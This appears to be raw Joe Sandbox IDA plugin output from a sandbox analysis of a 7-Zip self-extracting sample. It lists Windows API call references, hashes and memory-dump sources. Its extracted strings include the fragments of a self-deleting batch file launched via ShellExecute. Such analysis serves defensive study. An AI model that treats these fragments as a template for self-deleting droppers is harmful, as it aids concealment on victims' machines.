                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??2@??3@memmove
                                          • String ID:
                                          • API String ID: 3828600508-0
                                          • Opcode ID: 681e1b0d226f40fe4ab8b8450f07d9ff2e75d0d2427af455dbd11f2bdce48d51
                                          • Instruction ID: a8ce0a3cb4653ecb547b1a3698f229d81d6147035ad3680bc60947505803a3f4
                                          • Opcode Fuzzy Hash: 681e1b0d226f40fe4ab8b8450f07d9ff2e75d0d2427af455dbd11f2bdce48d51
                                          • Instruction Fuzzy Hash: 74F089763047016FC3205B1ADC80857BBABDFC4715311883FE55E93A50D634F891965A
                                          APIs
                                          • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 0040247E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: GlobalMemoryStatus
                                          • String ID: @
                                          • API String ID: 1890195054-2766056989
                                          • Opcode ID: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
                                          • Instruction ID: 9ce3ff159218229c34eda893c3d8d64f83397f3f2cddac743d7c565554413103
                                          • Opcode Fuzzy Hash: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
                                          • Instruction Fuzzy Hash: AAF0AF30A042048ADF15AB719E8DA5A37A4BB00348F10853AF516F52D4D7BCE9048B5D
                                          APIs
                                            • Part of subcall function 0040AAAB: _CxxThrowException.MSVCRT(?,00414EF8), ref: 0040AAC5
                                            • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                            • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                            • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,004149F0,?,004149B0), ref: 0040CAF2
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,004149F0,?,004149B0), ref: 0040CC4A
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??3@$??2@ExceptionThrowmemmove
                                          • String ID:
                                          • API String ID: 4269121280-0
                                          • Opcode ID: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
                                          • Instruction ID: 88480e7f7e551c391a26326ce122d220a9eefc885560dc6ed21150e7f5ba8ef6
                                          • Opcode Fuzzy Hash: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
                                          • Instruction Fuzzy Hash: 00712571A00209EFCB24DFA5C8D1AAEBBB1FF08314F10463AE545A3291D739A945CF99
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??3@H_prolog
                                          • String ID:
                                          • API String ID: 1329742358-0
                                          • Opcode ID: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
                                          • Instruction ID: 956102545b91a7c0cba0a64d671320761176ea25dc816e9057e3d4af94f09eda
                                          • Opcode Fuzzy Hash: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
                                          • Instruction Fuzzy Hash: 0D411F32800204AFCB09DB65CD45EBE7B35EF50304B18883BF402B72E2D63E9E21965B
                                          APIs
                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??2@??3@
                                          • String ID:
                                          • API String ID: 1936579350-0
                                          • Opcode ID: 453a3e3f1ff100c9dcfb77a92201942aa697f3f866fb972755d4e05e551f17b9
                                          • Instruction ID: 063e94d8e06ff9613a5b681c15dc067c338ae4066a9753272274ce5f9f11bd0f
                                          • Opcode Fuzzy Hash: 453a3e3f1ff100c9dcfb77a92201942aa697f3f866fb972755d4e05e551f17b9
                                          • Instruction Fuzzy Hash: 71F0A476210612ABC334DF2DC581867B3E4EF88711710893FE6C7C72B1DA31A881C754
                                          APIs
                                          • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000024,004025DB,00000001,00000020,00402AB6,00000000,00000000,00000000,00000020), ref: 004022C0
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000024,004025DB,00000001,00000020,00402AB6,00000000,00000000,00000000,00000020), ref: 004022E4
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??2@??3@
                                          • String ID:
                                          • API String ID: 1936579350-0
                                          • Opcode ID: 161b1d3c566106e9ad65e75d5d4507556b29aa609190ea75727e2c569a68f83b
                                          • Instruction ID: 09ebe67ff45b08f81c36141d9c2dc2e417a159b47c448e0a3757dda97e47d19e
                                          • Opcode Fuzzy Hash: 161b1d3c566106e9ad65e75d5d4507556b29aa609190ea75727e2c569a68f83b
                                          • Instruction Fuzzy Hash: 8CF030351046529FC330DF69C584853F7E4EB59715721887FE1D6D36A2C674A880CB64
                                          APIs
                                          • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040DA0B
                                          • GetLastError.KERNEL32(?,?,?,?), ref: 0040DA19
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastPointer
                                          • String ID:
                                          • API String ID: 2976181284-0
                                          APIs
                                          • SysAllocString.OLEAUT32(?), ref: 0040ED05
                                          • _CxxThrowException.MSVCRT(?,00415010), ref: 0040ED28
                                          Similarity
                                          • API ID: AllocExceptionStringThrow
                                          • String ID:
                                          • API String ID: 3773818493-0
                                          APIs
                                          • EnterCriticalSection.KERNEL32(?), ref: 0040E745
                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040E764
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave
                                          • String ID:
                                          • API String ID: 3168844106-0
                                          APIs
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          APIs
                                          • SetFileAttributesW.KERNELBASE(?,?), ref: 0040124F
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          APIs
                                            • Part of subcall function 0040D985: CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                          • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50), ref: 0040DA78
                                          Similarity
                                          • API ID: CloseCreateFileHandle
                                          • String ID:
                                          • API String ID: 3498533004-0
                                          APIs
                                          • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040DD78,00000001,00000000,00000000,00413330,?,00404D94,?,?), ref: 0040DBBA
                                          Similarity
                                          • API ID: FileWrite
                                          • String ID:
                                          • API String ID: 3934441357-0
                                          APIs
                                          • _beginthreadex.MSVCRT ref: 00406552
                                            • Part of subcall function 00406501: GetLastError.KERNEL32(00406563,00000000), ref: 004064F5
                                          Similarity
                                          • API ID: ErrorLast_beginthreadex
                                          • String ID:
                                          • API String ID: 4034172046-0
                                          APIs
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          APIs
                                          • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040DAF2
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          APIs
                                          • SetFileTime.KERNELBASE(?,?,?,?,0040DB94,00000000,00000000,?,0040123C,?), ref: 0040DB78
                                          Similarity
                                          • API ID: FileTime
                                          • String ID:
                                          • API String ID: 1425588814-0
                                          APIs
                                          • ??2@YAPAXI@Z.MSVCRT(00000060,?,?,00000000,?,0040D96E,00000000,?,00000000,00000000,000000FF,?,00000001,?,?,?), ref: 0040D91A
                                          Similarity
                                          • API ID: ??2@
                                          • String ID:
                                          • API String ID: 1033339047-0
                                          APIs
                                          Similarity
                                          • API ID: free
                                          • String ID:
                                          • API String ID: 1294909896-0
                                          APIs
                                          • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                                          Similarity
                                          • API ID: ??2@
                                          • String ID:
                                          • API String ID: 1033339047-0
                                          APIs
                                          • CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID:
                                          • API String ID: 2962429428-0
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040E4D6,00020000,00000000,?,00000000,?,0040D92B,?,?,00000000,?,0040D96E), ref: 004024E0
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          APIs
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,0040E561,?,00000004,0040E5B0,?,?,004117E5,?), ref: 00401B2A
                                          Similarity
                                          • API ID: FreeVirtual
                                          • String ID:
                                          • API String ID: 1263568516-0
                                          • Opcode ID: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                          • Instruction ID: 5381ed20748db0b7fd93371e38984c83fa4171db9cf80dc6a42123bab5888d64
                                          • Opcode Fuzzy Hash: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                          • Instruction Fuzzy Hash: 45A002305446007ADE515B10DD05F457F516744B11F20C5547155540E586755654DA09
                                          APIs
                                          Similarity
                                          • API ID: free
                                          • String ID:
                                          • API String ID: 1294909896-0
                                          • Opcode ID: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                          • Instruction ID: 7baee4be7330d58fba6a4d3e6254b3dabd4481adb37f3967e502ba2394f26960
                                          • Opcode Fuzzy Hash: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                          • Instruction Fuzzy Hash:
                                          APIs
                                          • _wtol.MSVCRT ref: 004034E5
                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,CC5BE863,00000000,004177A0,00000000,00417794), ref: 00403588
                                          • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 004035F9
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 00403601
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00403609
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00403611
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00403619
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00403621
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403629
                                          • _wtol.MSVCRT ref: 0040367F
                                          • CoCreateInstance.OLE32(00414BF4,00000000,00000001,00414BE4,00404F9B,.lnk,?,0000005C), ref: 00403720
                                          • ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 004037B8
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 004037C0
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 004037C8
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 004037D0
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 004037D8
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 004037E0
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 004037E8
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 004037EE
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 004037F6
                                          Strings
                                          Similarity
                                          • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                          • String ID: .lnk
                                          • API String ID: 408529070-24824748
                                          • Opcode ID: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
                                          • Instruction ID: c4a1d47ac56633071a1bd2db01059e5edb54ffe0bccc65637149caefe5d2277b
                                          • Opcode Fuzzy Hash: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
                                          • Instruction Fuzzy Hash: 8EA18A71910219ABDF04EFA1CC46DEEBB79EF44705F50442AF502B71A1EB79AA81CB18
                                          APIs
                                          • GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                          • wsprintfW.USER32 ref: 00401FFD
                                          • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                          • GetLastError.KERNEL32 ref: 00402017
                                          • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                          • GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                          • GetLastError.KERNEL32 ref: 0040204C
                                          • lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                          • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                          • ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                                          • SetLastError.KERNEL32(00000000), ref: 00402098
                                          • lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                          • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                          • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                          • _wtol.MSVCRT ref: 0040212A
                                          • MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                          Strings
                                          Similarity
                                          • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                          • String ID: 7zSfxString%d$XpA$\3A
                                          • API String ID: 2117570002-3108448011
                                          • Opcode ID: 548ade176c921e3c89d1731ce67e310a71d7e7a73203bdbbb6ff14cd1b9bb65a
                                          • Instruction ID: 5c0681f152172bce6659d4e02be164ba9bb36eab7c70e8d4f1a0ed4420d73572
                                          • Opcode Fuzzy Hash: 548ade176c921e3c89d1731ce67e310a71d7e7a73203bdbbb6ff14cd1b9bb65a
                                          • Instruction Fuzzy Hash: 11518471604305AFDB209F74DD899DBBBB9EB08345B11407AF646E62E0E774AA44CB18
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                          • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                          • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                          • SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                          • LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                          • LockResource.KERNEL32(00000000), ref: 00401C41
                                          • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401C6D
                                          • GetProcAddress.KERNEL32(00000000), ref: 00401C76
                                          • wsprintfW.USER32 ref: 00401C95
                                          • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401CAA
                                          • GetProcAddress.KERNEL32(00000000), ref: 00401CAD
                                          Strings
                                          Similarity
                                          • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                          • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                          • API String ID: 2639302590-365843014
                                          • Opcode ID: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                          • Instruction ID: 1b367ad183524107b1556f539f271e2bfa11f4d2ebd4ebc35158efee647c5c94
                                          • Opcode Fuzzy Hash: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                          • Instruction Fuzzy Hash: 002153B1944318BBDB109FA59D48F9B7FBCEB48751F118036FA05B72D1D678DA008BA8
                                          APIs
                                          • wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                          • GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                          • FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                          • FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                          • lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                          • lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                          • lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                          • lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                          • LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                          Similarity
                                          • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                          • String ID:
                                          • API String ID: 829399097-0
                                          • Opcode ID: a8862aa27d5a6cc2b1ba12d709e13e5df444902fd3bed4afc67f02113c073308
                                          • Instruction ID: 98041b7e574f1f1c61a73cce3db0a13ad597614178cae5aaf21d0c5f67190c53
                                          • Opcode Fuzzy Hash: a8862aa27d5a6cc2b1ba12d709e13e5df444902fd3bed4afc67f02113c073308
                                          • Instruction Fuzzy Hash: 85218172804209BEDF14AFA0DC85CEB7BACEB04355B10847BF506A7150EB34EE848BA4
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,00413454,?,?,?,00000000), ref: 00402BA8
                                          • lstrcmpW.KERNEL32(?,00413450,?,0000005C,?,?,?,00000000), ref: 00402BFB
                                          • lstrcmpW.KERNEL32(?,00413448,?,?,00000000), ref: 00402C11
                                          • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402C27
                                          • DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402C2E
                                          • FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402C40
                                          • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402C4F
                                          • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402C5A
                                          • RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402C63
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C6E
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C79
                                          Similarity
                                          • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                                          • String ID:
                                          • API String ID: 1862581289-0
                                          • Opcode ID: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
                                          • Instruction ID: 7ffcf375551190f92b7aba4ef5ef3cd4ed0286f9dec59b0789af02bc25bdcc12
                                          • Opcode Fuzzy Hash: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
                                          • Instruction Fuzzy Hash: A321A230500209BAEB10AF61DE4CFBF7B7C9B0470AF14417AB505B11E0EB78DB459A6C
                                          APIs
                                          • LoadLibraryA.KERNEL32(uxtheme,?,00407F57,000004B1,00000000,?,?,?,?,?,0040803E), ref: 00406D65
                                          • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00406D76
                                          • GetWindow.USER32(?,00000005), ref: 00406D8F
                                          • GetWindow.USER32(00000000,00000002), ref: 00406DA5
                                          Strings
                                          Similarity
                                          • API ID: Window$AddressLibraryLoadProc
                                          • String ID: SetWindowTheme$\EA$uxtheme
                                          • API String ID: 324724604-1613512829
                                          • Opcode ID: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                                          • Instruction ID: f2e0bdee1e376373ef12be0a37c87caa708c4cf78f5ebad58458586032015049
                                          • Opcode Fuzzy Hash: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                                          • Instruction Fuzzy Hash: 47F0A73274172537C6312A6A6C4CF9B6B9C9FC6B51B070176B905F7280DA6CCD0045BC
                                          APIs
                                          • GetDriveTypeW.KERNEL32(?,?,?), ref: 00404B46
                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404B77
                                          • WriteFile.KERNEL32(004177C4,?,?,00406437,00000000,del ",:Repeat,00000000), ref: 00404C2C
                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C37
                                          • CloseHandle.KERNEL32(004177C4), ref: 00404C40
                                          • SetFileAttributesW.KERNEL32(00406437,00000000), ref: 00404C57
                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00404C69
                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C72
                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C7E
                                          • ??3@YAXPAX@Z.MSVCRT(00406437,?), ref: 00404C84
                                          • ??3@YAXPAX@Z.MSVCRT(00406437,?,?,?,?,?,?,?,?,?,?,?,?,?,00406437,004177C4), ref: 00404CB2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                          • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                          • API String ID: 3007203151-3467708659
                                          • Opcode ID: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
                                          • Instruction ID: 7a4c4b622d76ac6c1822c64a370ea4e05d699ec4102568342bfcf68b8c9639ad
                                          • Opcode Fuzzy Hash: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
                                          • Instruction Fuzzy Hash: DE416171D01119BADB00EBA5ED85DEEBB78EF44358F50803AF511720E1EB78AE85CB58
                                          APIs
                                          • lstrcmpiW.KERNEL32(00000000,0041442C,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004046DF
                                            • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                            • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                            • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                            • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                            • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                            • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                            • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                            • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                            • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                            • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                            • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                            • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                            • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                          • _wtol.MSVCRT ref: 004047DC
                                          • _wtol.MSVCRT ref: 004047F8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
